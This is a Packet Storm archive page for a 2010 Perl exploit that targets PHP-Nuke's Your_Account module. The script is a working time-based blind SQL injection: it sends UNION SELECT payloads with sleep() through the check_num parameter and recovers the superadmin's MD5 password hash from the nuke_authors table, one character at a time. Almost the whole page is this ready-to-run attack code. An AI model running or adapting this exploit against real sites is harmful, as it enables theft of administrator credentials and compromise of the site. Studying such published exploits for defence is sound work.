exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

PHP-Nuke 8.1.0.3.5b Remote Blind SQL Injection

PHP-Nuke 8.1.0.3.5b Remote Blind SQL Injection
Posted Jul 13, 2010
Authored by yawn

PHP-Nuke versions 8.0 and below remote blind SQL injection exploit that leverages the Your_Account module.

tags | exploit, remote, php, sql injection
SHA-256 | 479f1c9e8c197f38dd5132116f1b112e1420ec05f750a66d75eabcdaa3c0f945

PHP-Nuke 8.1.0.3.5b Remote Blind SQL Injection

Change Mirror Download
# PHP-Nuke <= 8.1.0.3.5b (Your_Account Module) Remote Blind SQL Injection (Benchmark Mode)
# Author: yawn
# Contact Me: http://www.unitx.net
# Requirements: magic_quotes_gpc : off
# Greetings: #0day@irc.iside.us | #Unit-X@irc.unitx.net | Dante90

# You will remember, Watson, how the dreadful business of the
# Abernetty family was first brought to my notice by the depth which the
# parsley had sunk into the butter upon a hot day.
# -- Sherlock Holmes

use strict;
use warnings;
use LWP::UserAgent;

sub Nuke::Bench {
my $hosto = $_;
my $website = LWP::UserAgent->new;
my $average = 0;
print "[+] Calculating average load time (may take a while) ...\n";
for (my $i = 0; $i < 5 ; $i++) {
my $bef = time();
my $out = $website->get($hosto);
my $time = time();
$average += int($time-$bef);
}
return $average/5;
}

sub Nuke::Usage() {
print "[+] Usage: perl nuke.pl <host>\n";
print "[+] the host must be the complete path to modules.php\n";
print "[+] Example: perl nuke.pl http://www.site.com/modules.php\n";
}

sub Nuke::Banner() {
print "[+] Remote Blind SQL Injection (Benchmark Mode) PHP-Nuke 8.1.0.3.5b\n";
print "[+] I'm not responsable for an illegal use of this exploit\n";
print "[+] Date: 06-02-2010\n";
print "[+] Author: yawn\n";
}
Nuke::Banner();
my $host = shift || die Nuke::Usage();
$host .= "?name=Your_Account&op=activate&username=WTF";
my $time = Nuke::Bench($host);
my $attack = LWP::UserAgent->new;
my $pass = "";
$attack->agent('Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100407 Ubuntu/9.04 (jaunty) Shiretoko/3.5.9');
my @charset = (48..57, 97..102);
print "[+] Average load time is $time\n";
print "[+] Trying to exploit the SQL Injection\n";

for (my $j = 1; $j <=32; $j++) {
sleep(3); # PHP-Nuke has a special anti-flood system
foreach (@charset) {
sleep(2);
print "[+] Now trying with $_ \n";
my $before = time();
my $resp = $attack->post($host,
{ check_num => "'UNION/**/SELECT IF(SUBSTRING(pwd,$j,1) = CHAR($_),sleep(6),null),1,2,3,4,5,6 FROM nuke_authors WHERE radminsuper='1" },
Referer => $host);
my $after = time();
if(int($after-$before) > ($time + 4)) {
print "[+] Success with ".chr($_)."\n";
$pass .= chr($_);
last;
}
}
}
print "[+] MD5 Hash : $pass\n";


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close